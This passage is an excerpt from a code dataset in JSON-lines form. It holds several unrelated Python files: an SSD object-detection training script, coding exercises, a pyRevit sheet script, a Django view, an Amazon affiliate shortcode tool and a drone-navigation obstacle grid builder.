input_shape[1]), anchors_size)\r\n bbox_util = BBoxUtility(NUM_CLASSES, priors)\r\n\r\n model = SSD300(input_shape, NUM_CLASSES, anchors_size)\r\n # ------------------------------------------------------#\r\n # 训练自己的数据集时提示维度不匹配正常\r\n # 预测的东西都不一样了自然维度不匹配\r\n # ------------------------------------------------------#\r\n\r\n # 加载预训练模型\r\n model_path = 'model_data/essay_mobilenet_ssd_weights.h5'\r\n model.load_weights(model_path, by_name=True, skip_mismatch=True)\r\n\r\n # -------------------------------------------------------------------------------#\r\n # 训练参数的设置\r\n # logging表示tensorboard的保存地址\r\n # checkpoint用于设置权值保存的细节,period用于修改多少epoch保存一次\r\n # reduce_lr用于设置学习率下降的方式\r\n # early_stopping用于设定早停,val_loss多次不下降自动结束训练,表示模型基本收敛\r\n # -------------------------------------------------------------------------------#\r\n logging = TensorBoard(log_dir=log_dir)\r\n\r\n checkpoint = ParallelModelCheckpoint(model, log_dir + 'ep{epoch:03d}-loss{loss:.3f}-val_loss{val_loss:.3f}.h5',\r\n monitor='val_loss', save_weights_only=True,save_best_only=False,\r\n period=1) # 解决多GPU运行下保存模型报错的问题\r\n\r\n reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.5, patience=3, verbose=1)\r\n early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=10, verbose=1)\r\n\r\n # ----------------------------------------------------------------------#\r\n # 验证集的划分在train.py代码里面进行\r\n # 2007_test.txt和2007_val.txt里面没有内容是正常的。训练不会使用到。\r\n # 当前划分方式下,验证集和训练集的比例为1:9\r\n # ----------------------------------------------------------------------#\r\n val_split = 0.1\r\n with open(annotation_path) as f:\r\n lines = f.readlines()\r\n np.random.seed(10101)\r\n np.random.shuffle(lines)\r\n np.random.seed(None)\r\n num_val = int(len(lines) * val_split)\r\n num_train = len(lines) - num_val\r\n\r\n # ------------------------------------------------------#\r\n # 主干特征提取网络特征通用,冻结训练可以加快训练速度\r\n # 也可以在训练初期防止权值被破坏。\r\n # Init_Epoch为起始世代\r\n # Freeze_Epoch为冻结训练的世代\r\n # Epoch总训练世代\r\n # 提示OOM或者显存不足请调小Batch_size\r\n # ------------------------------------------------------#\r\n\r\n print(\"******************** before model ********************\")\r\n model.summary()\r\n if Cuda:\r\n model = multi_gpu_model(model,gpus=2) # 2块GPU训练\r\n print(\"******************** after model ********************\")\r\n model.summary()\r\n\r\n # ------------------------#\r\n # 冻结训练 #\r\n # -----------------------#\r\n for i in range(21): # 80\r\n model.layers[3].layers[i].trainable = False # 注意模型被包装到multi_gpu_model,加layers[3]\r\n if True:\r\n Init_epoch = 0\r\n Freeze_epoch = 50\r\n BATCH_SIZE = 16\r\n learning_rate_base = 5e-4\r\n\r\n gen = Generator(bbox_util, BATCH_SIZE, lines[:num_train], lines[num_train:],\r\n (input_shape[0], input_shape[1]), NUM_CLASSES)\r\n\r\n model.compile(optimizer=Adam(lr=learning_rate_base),\r\n loss=MultiboxLoss(NUM_CLASSES, neg_pos_ratio=3.0).compute_loss)\r\n model.fit_generator(gen.generate(True),\r\n steps_per_epoch=num_train // BATCH_SIZE,\r\n validation_data=gen.generate(False),\r\n validation_steps=num_val // BATCH_SIZE,\r\n epochs=Freeze_epoch,\r\n initial_epoch=Init_epoch,\r\n callbacks=[logging, checkpoint, reduce_lr, early_stopping],\r\n workers=16)\r\n\r\n # ------------------------#\r\n # 解冻训练 #\r\n # -----------------------#\r\n for i in range(21): # 80\r\n model.layers[3].layers[i].trainable = True # 注意模型被包装到multi_gpu_model,加layers[3]\r\n if True:\r\n Freeze_epoch = 50\r\n Epoch = 100\r\n BATCH_SIZE = 8\r\n learning_rate_base = 1e-4\r\n\r\n gen = Generator(bbox_util, BATCH_SIZE, lines[:num_train], lines[num_train:],\r\n (input_shape[0], input_shape[1]), NUM_CLASSES)\r\n\r\n model.compile(optimizer=Adam(lr=learning_rate_base),\r\n loss=MultiboxLoss(NUM_CLASSES, neg_pos_ratio=3.0).compute_loss)\r\n model.fit_generator(gen.generate(True),\r\n steps_per_epoch=num_train // BATCH_SIZE,\r\n validation_data=gen.generate(False),\r\n validation_steps=num_val // BATCH_SIZE,\r\n epochs=Epoch,\r\n initial_epoch=Freeze_epoch,\r\n callbacks=[logging, checkpoint, reduce_lr, early_stopping],\r\n workers=16)\r\n","sub_path":"train-multi-gpu.py","file_name":"train-multi-gpu.py","file_ext":"py","file_size_in_byte":8059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"129184817","text":"def func1():\n nums = list(map(int, input()[1:-1].split(\",\")))\n res, maximum = 0, 0\n for i in range(0, len(nums), 1):\n maximum = max(maximum, nums[i])\n if maximum == i:\n res += 1\n print(res)\n return\nfunc1()","sub_path":"Code/CodeRecords/2443/60624/265673.py","file_name":"265673.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"153905070","text":"from __future__ import print_function\r\n\r\n#===============================================================================\r\n# pyRevit\r\n#===============================================================================\r\n__doc__ = 'Test'\r\n\r\n#===============================================================================\r\n# Logging\r\n#===============================================================================\r\nimport logging\r\nlogging.basicConfig(level=logging.DEBUG)\r\n\r\n#===============================================================================\r\n# Import Revit\r\n#===============================================================================\r\nrvt_app = __revit__.Application\r\nrvt_uidoc = __revit__.ActiveUIDocument\r\nrvt_doc = __revit__.ActiveUIDocument.Document\r\nimport Autodesk.Revit.DB as rvt_db\r\n\r\n#===============================================================================\r\n# Configuration\r\n#===============================================================================\r\nOVERVIEWPLAN_CENTER = rvt_db.XYZ(1.656061764, 1.323727996, 0.036311942)\r\n\r\n#===============================================================================\r\n# Imports other\r\n#===============================================================================\r\nimport sys\r\nfrom collections import defaultdict\r\n\r\n\r\npath_package = r\"C:\\EclipseGit\\ExergyUtilities\\ExergyUtilities\"\r\nsys.path.append(path_package)\r\nimport utility_revit_api as util_ra\r\n\r\n#===============================================================================\r\n# Definitions\r\n#===============================================================================\r\ndef update_sheets_views(excel_dict, sheets_by_name, views, viewports):\r\n logging.debug(util_ra.get_self())\r\n count = 0\r\n for i,row in enumerate(excel_dict):\r\n \r\n assert row['SOURCE'] == 'RVT'\r\n if row['VIEW TYPE'] != 'PLAN':\r\n continue\r\n\r\n assert row['Sheet Name'] in sheets_by_name, \"Sheet {} does not exist\".format(row['Sheet Name'])\r\n assert row['View Name'] in views, \"View {} does not exist\".format(row['View Name'])\r\n assert row['MAIN VIEWPORT'] in viewports, \"Viewport {} does not exist\".format(row['MAIN VIEWPORT'])\r\n\r\n # Test views in register matches views placed in Revit\r\n placed_views = sheets_by_name[row['Sheet Name']].GetAllPlacedViews() \r\n view_match = False\r\n legend_match = False\r\n for view_id in placed_views:\r\n view = rvt_doc.GetElement(view_id)\r\n if view.Name == row['View Name']:\r\n view_match = True\r\n \r\n # Test view match\r\n if not view_match:\r\n count+=1\r\n print(\"Add {} to {}\".format(row['View Name'],row['Sheet Name']))\r\n util_ra.add_view_sheet(rvt_doc, \r\n sheets_by_name[row['Sheet Name']], \r\n views[row['View Name']], \r\n OVERVIEWPLAN_CENTER,\r\n viewports[row['MAIN VIEWPORT']].GetTypeId())\r\n \r\n logging.debug(\"Added views to {} sheets\".format(count))\r\n \r\n\r\n#===============================================================================\r\n# Main\r\n#===============================================================================\r\n#-Logging info---\r\nlogging.info(\"Python version : {}\".format(sys.version))\r\nlogging.info(\"uidoc : {}\".format(rvt_uidoc))\r\nlogging.info(\"doc : {}\".format(rvt_doc))\r\nlogging.info(\"app : {}\".format(rvt_app))\r\n\r\n#-Paths---\r\nfolder_csv = r\"C:\\CesCloud Revit\\_03_IKEA_Working_Folder\"\r\nname_csv = r\"\\20160722 Document Register.csv\"\r\npath_csv = folder_csv + name_csv\r\n\r\n#-Get data---\r\ndata_dict = util_ra.get_data_csv(path_csv)\r\ndata_dict_RVT = [row for row in data_dict if row['SOURCE'] == 'RVT']\r\n\r\n#-Get all floorplans, sheets_by_name, titleblocks, legends---\r\nutil_ra.get_all_views(rvt_doc)\r\ntitle_blocks = util_ra.get_title_blocks(rvt_doc)\r\nsheets_by_name = util_ra.get_sheet_dict_by_names(rvt_doc)\r\nfloorplans = util_ra.get_views_by_type(rvt_doc, 'FloorPlan')\r\nall_views = util_ra.get_all_views(rvt_doc)\r\nlegends = util_ra.get_views_by_type(rvt_doc,'Legend')\r\ntemplates = util_ra.get_view_templates(rvt_doc)\r\nviewports = util_ra.get_viewports_dict_by_names(rvt_doc)\r\n\r\n#-Check---\r\nupdate_sheets_views(data_dict_RVT,sheets_by_name,all_views,viewports)\r\n\r\nlogging.info(\"---DONE---\".format())","sub_path":"RevitAPI/pyRevit/MJ_PlaceMainViews.py","file_name":"MJ_PlaceMainViews.py","file_ext":"py","file_size_in_byte":4420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"278489917","text":"# Time: ctor: O(m * n),\n# lookup: O(1)\n# Space: O(m * n)\n#\n# Given a 2D matrix matrix, find the sum of the elements inside\n# the rectangle defined by its upper left corner (row1, col1)\n# and lower right corner (row2, col2).\n#\n# Range Sum Query 2D\n# The above rectangle (with the red border) is defined by\n# (row1, col1) = (2, 1) and (row2, col2) = (4, 3),\n# which contains sum = 8.\n#\n# Example:\n# Given matrix = [\n# [3, 0, 1, 4, 2],\n# [5, 6, 3, 2, 1],\n# [1, 2, 0, 1, 5],\n# [4, 1, 0, 1, 7],\n# [1, 0, 3, 0, 5]\n# ]\n#\n# sumRegion(2, 1, 4, 3) -> 8\n# sumRegion(1, 1, 2, 2) -> 11\n# sumRegion(1, 2, 2, 4) -> 12\n# Note:\n# You may assume that the matrix does not change.\n# There are many calls to sumRegion function.\n# You may assume that row1 <= row2 and col1 <= col2.\n\nclass NumMatrix(object):\n def __init__(self, matrix):\n \"\"\"\n initialize your data structure here.\n :type matrix: List[List[int]]\n \"\"\"\n if not matrix: # otherwise len(matrix[0]): IndexError: list index out of range\n return\n\n m, n = len(matrix), len(matrix[0])\n self.__sums = [[0] * (n+1) for _ in range(m+1)]\n for i in xrange(1, m+1):\n for j in xrange(1, n+1):\n self.__sums[i][j] = self.__sums[i][j-1] + self.__sums[i-1][j] - \\\n self.__sums[i-1][j-1] + matrix[i-1][j-1]\n '''\n for i in range(m):\n val = 0\n for j in range(n):\n val += matrix[i][j]\n self.__sums[i+1][j+1] = self.__sums[i][j+1] + val\n '''\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\"\n sum of elements matrix[(row1,col1)..(row2,col2)], inclusive.\n :type row1: int\n :type col1: int\n :type row2: int\n :type col2: int\n :rtype: int\n \"\"\"\n return self.__sums[row2+1][col2+1] - self.__sums[row2+1][col1] - \\\n self.__sums[row1][col2+1] + self.__sums[row1][col1]\n\n\n# Your NumMatrix object will be instantiated and called as such:\n# numMatrix = NumMatrix(matrix)\n# numMatrix.sumRegion(0, 1, 2, 3)\n# numMatrix.sumRegion(1, 2, 3, 4)\n","sub_path":"Python/range-sum-query-2d-immutable.py","file_name":"range-sum-query-2d-immutable.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"600927264","text":"from .models import *\nimport json\nfrom django.shortcuts import *\nfrom django.views import generic\nfrom django.core.paginator import Paginator\nfrom django.http import HttpResponseBadRequest, JsonResponse\n\nclass IndexView(generic.ListView):\n model = Student\n template_name = 'student/admin_base.html'\n context_object_name = 'student_list'\n paginate_by = 4\n\n # def get_queryset(self):\n # students = self.paginator.page(self.current_page)\n # return students\n # return Student.objects.order_by('-student_age')[:]\n # return Student.objects.filter(student_sex__contains='girl')\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super(IndexView, self).get_context_data(**kwargs)\n\n paginator = context.get('paginator')\n page = context.get('page_obj')\n page_data = self.get_page_data(paginator, page)\n context.update(page_data)\n return context\n\n\n @staticmethod\n def get_page_data(paginator, page):\n\n page_list = []\n\n # ==============分页逻辑===============\n # 条件:页数>=10\n # 当前页<=5时,起始页为1\n # 当前页>(总页数-5)时,起始页为(总页数-9)\n # 其他情况 起始页为(当前页-5)\n # ====================================\n\n if paginator.num_pages > 10:\n if page.number <= 5:\n start_page = 1\n elif page.number > paginator.num_pages - 5:\n start_page = paginator.num_pages - 9\n else:\n start_page = page.number - 5\n\n for i in range(start_page, start_page + 10):\n page_list.append(i)\n else:\n for i in range(1, paginator.num_pages + 1):\n page_list.append(i)\n\n page_data = {'page_list': page_list}\n return page_data\n\nclass DetailView(generic.DetailView):\n model = Student\n template_name = 'student/detail.html'\n context_object_name = 'student'\n\ndef comment(request):\n if not request.is_ajax():\n return HttpResponseBadRequest()\n studentid = request.GET.get('studentId')\n comments = Comment.objects.filter(student_id__exact=studentid).values() # values() 转为字典\n json_list = list(comments)\n return JsonResponse(json_list, safe=False)","sub_path":"DjangoLearning/student/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"454641150","text":"# 1.使用两个进程,对同一个全局变量进行修改多次,会出现什么情况。\r\nimport multiprocessing,random,os,time\r\n# g=0\r\n# def add():\r\n# global g\r\n# for i in range(10000000):\r\n# g+=1\r\n# print(\"在add方法中g={}\".format(g))\r\n# def add1():\r\n# global g\r\n# for i in range(10):\r\n# g+=1\r\n#\r\n# print(\"在add1方���中g={}\".format(g))\r\n#\r\n# if __name__==\"__main__\":\r\n# p1=multiprocessing.Process(target=add)\r\n# p2=multiprocessing.Process(target=add1)\r\n# p1.start()\r\n# p2.start()\r\n# print(\"主程序中的g={}\".format(g))\r\n\r\n\r\nimport threading\r\n\r\ng=0\r\ndef add():\r\n global g\r\n for i in range(10000000):\r\n g+=1\r\n print(\"在add方法中g={}\".format(g))\r\nif __name__==\"__main__\":\r\n p1=threading.Thread(target=add)\r\n p2=threading.Thread(target=add)\r\n p1.start()\r\n p2.start()\r\n print(\"主程序中的g={}\".format(g))\r\n\r\n# 2.使用进程队列完成生产者消费者的例子\r\ndef produce(q):\r\n while True:\r\n tu=(\"香蕉\",\"苹果\",\"葡萄\")\r\n v=random.choice(tu)\r\n q.put(v)\r\n print(\"进程{}生产了{}\".format(os.getpid(),v))\r\n time.sleep(0.5)\r\n\r\n\r\ndef consume(q):\r\n while True:\r\n print(\"进程{}消费了{}\".format(os.getpid(),q.get()))\r\n time.sleep(1)\r\n\r\nif __name__==\"__main__\":\r\n q=multiprocessing.Queue()\r\n p1=multiprocessing.Process(target=produce,args=(q,))\r\n p2=multiprocessing.Process(target=consume,args=(q,))\r\n p1.start()\r\n p2.start()\r\n","sub_path":"code/day19/day18homework.py","file_name":"day18homework.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"125155227","text":"#!/bin/python3\n\nimport sys\n\n\nn = int(input().strip())\narr = [int(arr_temp) for arr_temp in input().strip().split(' ')]\n\npos = 0\nneg = 0\nzero = 0\n\nfor i in arr:\n if i > 0:\n pos+=1\n elif i < 0:\n neg+=1\n else:\n zero+=1\n\nprint(pos / float(n))\nprint(neg / float(n))\nprint(zero / float(n))\n","sub_path":"plus_minus.py","file_name":"plus_minus.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"52284604","text":"\nimport amazon.api\nimport os\nimport subprocess\nfrom PIL import Image, ImageTk\nimport PIL\nimport requests\nfrom io import BytesIO\nimport tkinter as tk\nfrom tkinter import *\nimport sys\nfrom collections import namedtuple\nfrom PyInquirer import prompt\nfrom ShGetter.main import get_product_sh\n\n\naccess_key_id = os.environ['AWS_ACCESS_KEY_ID']\nsecret_access_key = os.environ['AWS_SECRET_ACCESS_KEY']\nassociate_tag = os.environ['ASSOCIATE_TAG']\nregion = os.environ['AWS_REGION']\n\namazon = amazon.api.AmazonAPI(access_key_id, secret_access_key, associate_tag, Region=region)\n\nimage_list = []\nimage_index = 0\n\nroot = Tk() \nroot.geometry(\"600x600\")\n\npanel = tk.Label(root)\n\ndef main(keywords: str, get_am=True, get_sh=True) -> int:\n setup_tkinter()\n\n img_urls: [str] = []\n am: namedtuple = None\n sh: namedtuple = None\n if get_am:\n am: namedtuple = get_product_am(keywords)\n img_urls += am.img_urls\n if get_sh:\n sh: namedtuple = get_product_sh(keywords)\n img_urls += sh.img_urls\n\n img_url = prompt_choose_img(img_urls)\n\n short_code = create_shortcode(am=am, sh=sh, img_url=img_url)\n\n output(short_code)\n make_sound() \n \n return 0\n\ndef get_product_am(keywords: str) -> namedtuple:\n products = search_product_am(keywords)\n product = prompt_choose_product_am(products)\n\n afi_url = product.detail_page_url\n\n am = namedtuple('am', ('product_url', 'img_urls'))\n am.product_url = afi_url\n am.img_urls = [image.LargeImage.URL.text for image in product.images]\n return am\n\ndef search_product_am(keywords: str) -> amazon.api.AmazonSearch:\n for i in range(4):\n try:\n product = amazon.search(Keywords=keywords, SearchIndex='All')\n break\n except Exception as e:\n print(type(e), e.args, e)\n sys.exit('商品データ取得に失敗しました・・・_(._.)_')\n \n return product\n\n\ndef prompt_choose_product_am(products: amazon.api.AmazonSearch) -> amazon.api.AmazonProduct:\n product_list = [product for product in list(enumerate(products))]\n product_name_list = [f'{product[0]} {product[1].title}\\n \\\n {product[1].detail_page_url.replace(\"&tag=sabigara-22\", \"\")}\\n' \\\n for product in product_list]\n question = [\n {\n 'type': 'list',\n 'name': 'products',\n 'message': 'What do you want to do?',\n 'choices': product_name_list\n }\n ]\n answer = prompt(question)\n index = int(answer['products'][0:1])\n return product_list[index][1]\n\ndef prompt_choose_img(img_urls: [str]) -> str:\n\n index = 0\n for image_url in img_urls:\n res = requests.get(image_url)\n img = PIL.Image.open(BytesIO(res.content))\n\n img_tk = ImageTk.PhotoImage(img)\n\n image_list.append(img_tk)\n\n index += 1\n\n update_img()\n root.mainloop()\n\n return img_urls[image_index]\n\ndef create_shortcode(img_url: str, am: namedtuple, sh: namedtuple) -> str:\n am_product_url = ''\n sh_product_url = ''\n if am:\n am_product_url = am.product_url\n if sh:\n sh_product_url = sh.product_url\n\n return f'[afi amurl=\"{am_product_url}\" shurl=\"{sh_product_url}\" img_url=\"{img_url}\"]'\n\ndef output(short_code: str) -> None:\n process = subprocess.Popen('pbcopy', env={'LANG': 'en_US.UTF-8'}, stdin=subprocess.PIPE)\n process.communicate(short_code.encode('utf-8'))\n\n print(short_code)\n\ndef make_sound() -> None:\n os.system('afplay /System/Library/Sounds/Glass.aiff')\n\ndef setup_tkinter():\n root.bind('', show_prev)\n root.bind('', show_next)\n\n panel.pack(side=\"bottom\", fill=\"both\", expand=\"yes\")\n panel.bind(\"\", on_click)\n \ndef on_click(event):\n root.quit()\n\ndef show_prev(event):\n global image_index\n\n if not image_index <= 0:\n image_index -= 1\n\n update_img()\n\n\ndef show_next(event):\n global image_index\n\n if not image_index >= (len(image_list) - 1):\n image_index += 1\n\n update_img()\n\n\ndef update_img():\n panel.configure(image=image_list[image_index])\n panel.image = image_list[image_index]\n\n\nif __name__ == '__main__':\n keywords = '' \n if len(sys.argv) > 2:\n keywords = sys.argv[2]\n if sys.argv[1] == 'a':\n main(keywords, True, False)\n elif sys.argv[1] == 's':\n main(keywords, False, True)\n elif len(sys.argv) == 2:\n keywords = sys.argv[1]\n main(keywords)\n else:\n sys.exit('Arguments error')\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"227517337","text":"#!/usr/bin/python\n\n\"\"\"\nHeader Files\n\"\"\"\nimport matplotlib.pyplot as plt\nimport math\nimport numpy as np\nimport json\nfrom pprint import pprint\n\"\"\"\nKey value are dicts or lists\n\"\"\"\ndivision = 0.25\n\ndef line_y_cordinate_array(arr_x,p1,p2):\n\ty_arr=[]\n\tx1 = p1[0]\n\ty1 = p1[1]\n\tx2 = p2[0]\n\ty2 = p2[1]\n\n\tfor x in arr_x:\n\t\t y = y1 + ((y2-y1)/(x2-x1))*(x-x1)\n\ty_arr.append(y)\n\treturn y_arr\t \n\ndef line_x_cordinate_array(arr_y,p1,p2):\n\tx_arr=[]\n\tx1 = p1[0]\n\ty1 = p1[1]\n\tx2 = p2[0]\n\ty2 = p2[1]\n\n\tfor y in arr_y:\n\t\t x = x1 + ((x2-x1)/(y2-y1))*(y-y1)\n\ty_arr.append(y)\n\treturn y_arr\t\n\ndef Equidistantpoints(p1,p2):\n\tax=[] #sum of ax1 and ax2\n\tay=[] #sum of ay1 and ay2\n\tx1 = p1[0]\n\ty1 = p1[1]\n\tx2 = p2[0]\n\ty2 = p2[1]\n\n\twidth = abs(x1-x2)\n\theight = abs(y1-y2)\n\n\tminx = min(x1,x2)\n\tminy = min(y1,y2)\n\n\n\tx_parts = width/division # 8 parts\n\ty_parts = height/division # 3 parts\n\n\tax1= [minx + division*i for i in range(int(x_parts)+1)]\n\t# these are necessary points in the grid\n\tay1=line_y_cordinate_array(ax1,p1,p2)\n\n\tay2 = [miny + division*i for i in range(int(y_parts)+1)]\n\n\tax2 = line_x_cordinate_array(ay2,p1,p2)\n\n\n\tax = ax1+ax2\n\tay = ay1+ ay2\n\n\treturn ax,ay\n\n\n\n\ndef line(p1,p2):\n\tx_obs = []\n\ty_obs = []\n\tx1 = p1[0]\n\ty1 = p1[1]\n\tx2 = p2[0]\n\ty2 = p2[1]\n\n\twidth = abs(x1-x2)\n\theight = abs(y1-y2)\n\n\tminx = min(x1,x2)\n\tminy = min(y1,y2)\n\n\tif width==0.0 and height!=0.0:\n\t\ty_parts = height/division\n\t\ty_obs = [miny + 0.25*i for i in range(int(y_parts)+1)]\n\t\tx_obs = [minx for i in range(int(y_parts)+1)]\n\telif width !=0.0 and height ==0.0:\n\t\tx_parts = width/division\n\t\tx_obs = [minx+ 0.25*i for i in range(int(x_parts)+1)]\n\t\ty_obs = [miny for y in range(int(x_parts)+1)]\n\n\telif width !=0.0 and height !=0.0:\n\t\t\t\t\t\t\n\t\tx_parts = width/division\n\t\ty_parts = height/division\n\t\tfor i in range(int(y_parts)+1):\n\t\t\tfor j in range(int(x_parts)+1):\n\t\t\t\tx_obs.append(minx+division*j)\n\t\t\t\ty_obs.append(miny+division*i)\n\n\treturn x_obs,y_obs\n\n\ndef gate_side_lines(p,angle):\n\tx_obs = []\n\ty_obs = []\n\tnew_p1 = [0,0]\n\tnew_p2 = [0,0]\n\tnew_p3 = [0,0]\n\tnew_p4 = [0,0]\n\n\tif angle == -90.0:\n\t\ta = 90.0\n\telse:\n\t\ta = angle\n\n\n\tif a == 135.0:\n\t\tnew_p1[0] = p[0]-division\n\t\tnew_p1[1] = p[1]-division\n\t\tnew_p2[0] = new_p1[0]-division\n\t\tnew_p2[1] =\tnew_p1[1]-division\n\n\t\tLINE1_X,LINE1_Y = line(new_p1,new_p2)\n\t\tx_obs= x_obs+LINE1_X\n\t\ty_obs= y_obs+LINE1_Y\n\n\t\tnew_p3[0] = p[0]+division\n\t\tnew_p3[1] = p[1]+division\n\t\tnew_p4[0] = new_p3[0]+division\n\t\tnew_p4[1] =\tnew_p3[1]+division\n\n\t\tLINE2_X,LINE2_Y = line(new_p3,new_p4)\n\t\tx_obs= x_obs+LINE2_X\n\t\ty_obs= y_obs+LINE2_Y\n\n\n\tif a == 45.0:\n\t\tnew_p1[0] = p[0]+division\n\t\tnew_p1[1] = p[1]-division\n\t\tnew_p2[0] = new_p1[0]+division\n\t\tnew_p2[1] =\tnew_p1[1]-division\n\n\t\tLINE1_X,LINE1_Y = line(new_p1,new_p2)\n\t\tx_obs= x_obs+LINE1_X\n\t\ty_obs= y_obs+LINE1_Y\n\n\t\tnew_p3[0] = p[0]-division\n\t\tnew_p3[1] = p[1]+division\n\t\tnew_p4[0] = new_p3[0]-division\n\t\tnew_p4[1] =\tnew_p3[1]+division\n\n\t\tLINE2_X,LINE2_Y = line(new_p3,new_p4)\n\t\tx_obs= x_obs+LINE2_X\n\t\ty_obs= y_obs+LINE2_Y\n\n\n\tif a == 90.0:\n\t\tnew_p1[0] = p[0]\n\t\tnew_p1[1] = p[1]-division\n\t\tnew_p2[0] = new_p1[0]\n\t\tnew_p2[1] =\tnew_p1[1]-division\n\n\t\tLINE1_X,LINE1_Y = line(new_p1,new_p2)\n\t\tx_obs= x_obs+LINE1_X\n\t\ty_obs= y_obs+LINE1_Y\n\n\t\tnew_p3[0] = p[0]\n\t\tnew_p3[1] = p[1]+division\n\t\tnew_p4[0] = new_p3[0]\n\t\tnew_p4[1] =\tnew_p3[1]+division\n\n\t\tLINE2_X,LINE2_Y = line(new_p3,new_p4)\n\t\tx_obs= x_obs+LINE2_X\n\t\ty_obs= y_obs+LINE2_Y\n\n\n\n\n\tif a == 0.0:\n\t\tnew_p1[0] = p[0]+division\n\t\tnew_p1[1] = p[1]\n\t\tnew_p2[0] = new_p1[0]+division\n\t\tnew_p2[1] =\tnew_p1[1]\n\n\t\tLINE1_X,LINE1_Y = line(new_p1,new_p2)\n\t\tx_obs= x_obs+LINE1_X\n\t\ty_obs= y_obs+LINE1_Y\n\n\t\tnew_p3[0] = p[0]-division\n\t\tnew_p3[1] = p[1]\n\t\tnew_p4[0] = new_p3[0]-division\n\t\tnew_p4[1] =\tnew_p3[1]\n\n\t\tLINE2_X,LINE2_Y = line(new_p3,new_p4)\n\t\tx_obs= x_obs+LINE2_X\n\t\ty_obs= y_obs+LINE2_Y\t\t\t\t\t\n\n\n\tif a == 180.0:\n\t\tnew_p1[0] = p[0]+division\n\t\tnew_p1[1] = p[1]\n\t\tnew_p2[0] = new_p1[0]+division\n\t\tnew_p2[1] =\tnew_p1[1]\n\n\t\tLINE1_X,LINE1_Y = line(new_p1,new_p2)\n\t\tx_obs= x_obs+LINE1_X\n\t\ty_obs= y_obs+LINE1_Y\n\n\t\tnew_p3[0] = p[0]-division\n\t\tnew_p3[1] = p[1]\n\t\tnew_p4[0] = new_p3[0]-division\n\t\tnew_p4[1] =\tnew_p3[1]\n\n\t\tLINE2_X,LINE2_Y = line(new_p3,new_p4)\n\t\tx_obs= x_obs+LINE2_X\n\t\ty_obs= y_obs+LINE2_Y\n\n\n\treturn x_obs,y_obs\n\n\n\n\n\nwith open(\"/home/neil/dd2419_ws/src/course_packages/dd2419_resources/worlds_json/nav_challenge.world.json\") as file:\n data = json.load(file)\n airspace = data[\"airspace\"]\n gates = data[\"gates\"]\n gpoint = []\n gangle = []\n for i in range(len(gates)):\n gpoint.append([gates[i]['position'][0], gates[i]['position'][1]]) # point = [x,y]\n gangle.append(gates[i]['heading']) # angle = [135]\n \n #print(gangle) # gate points[[]] \n #print(gpoint) # gate angles []\n walls = data[\"walls\"]\n lmin = airspace[\"min\"]\n lmax = airspace[\"max\"]\n wstart = [walls[0]['plane']['start'], walls[1]['plane']['start']]\n wstop = [walls[0]['plane']['stop'], walls[1]['plane']['stop']]\n\n w_st1 = [wstart[0][0], wstart[0][1]]\n w_sp1 = [wstop[0][0], wstop[0][1]]\n w_st2 = [wstart[1][0], wstart[1][1]]\n w_sp2 = [wstop[1][0], wstop[1][1]]\n #print(gangle) # all heading angles for gates\n #print(lmin) # 3d grid minimum point\n\n#lets make the grid\n\nx_min = lmin[0]# -4\ny_min = lmin[1]# -2\nz_min = lmin[2]\nx_max = lmax[0]# +2\ny_max = lmax[1]# +2\nz_max = lmax[2]\n#print(x_min,y_min,x_max,y_max)\nwidth = x_max - x_min #6.0 \nheight = y_max - y_min #4.0\n\n\ngrid_width = width/division# 24\ngrid_height = height/division# 16\n\n\n\n\n\n# 1. lets make borders first\nox , oy = [], []\n# just for addition\n\nfor i in range(int(grid_width)+1):\n\tox.append(x_min+division*i)\n\toy.append(y_min)\n\n# print(len(ox))\n# print(ox) # 25 points including start and end but divide line segment into 24 pts\n# print(oy)\n\n\nfor i in range(int(grid_width)+1):\n\tox.append(x_min+division*i)\n\toy.append(y_max)\n\nfor i in range(int(grid_height)+1):\n\tox.append(x_min)\n\toy.append(y_min+division*i)\n\nfor i in range(int(grid_height)+1):\n\tox.append(x_max)\n\toy.append(y_min+division*i)\n\n\n\n#wall_1 = list(Equidistantpoints(w_st1,w_sp1)) # points will be [(x,y),.....]\n#wall_2 = list(Equidistantpoints(w_st2,w_sp2))\n\n\n\n#print(\"wall1\",wall_1)\n\n\n# 2. now we will make walls\n\n\nwall_1_x,wall_1_y = line(w_st1,w_sp1)\nox = ox + wall_1_x\noy = oy +wall_1_y\nwall_2_x,wall_2_y = line(w_st2,w_sp2)\nox = ox + wall_2_x\noy = oy +wall_2_y\n\n# 3. now we will make gate side lines\n\n\ngate_1_x,gate_1_y = gate_side_lines(gpoint[0],gangle[0])\nox = ox + gate_1_x\noy = oy + gate_1_y\n\ngate_2_x,gate_2_y = gate_side_lines(gpoint[1],gangle[1])\nox = ox + gate_2_x\noy = oy + gate_2_y\n\ngate_3_x,gate_3_y = gate_side_lines(gpoint[2],gangle[2])\nox = ox + gate_3_x\noy = oy + gate_3_y\n\ngate_4_x,gate_4_y = gate_side_lines(gpoint[3],gangle[3])\nox = ox + gate_4_x\noy = oy + gate_4_y\n\ngate_5_x,gate_5_y = gate_side_lines(gpoint[4],gangle[4])\nox = ox + gate_5_x\noy = oy + gate_5_y\n\ngate_6_x,gate_6_y = gate_side_lines(gpoint[5],gangle[5])\nox = ox + gate_6_x\noy = oy + gate_6_y\n\ngate_7_x,gate_7_y = gate_side_lines(gpoint[6],gangle[6])\nox = ox + gate_7_x\noy = oy + 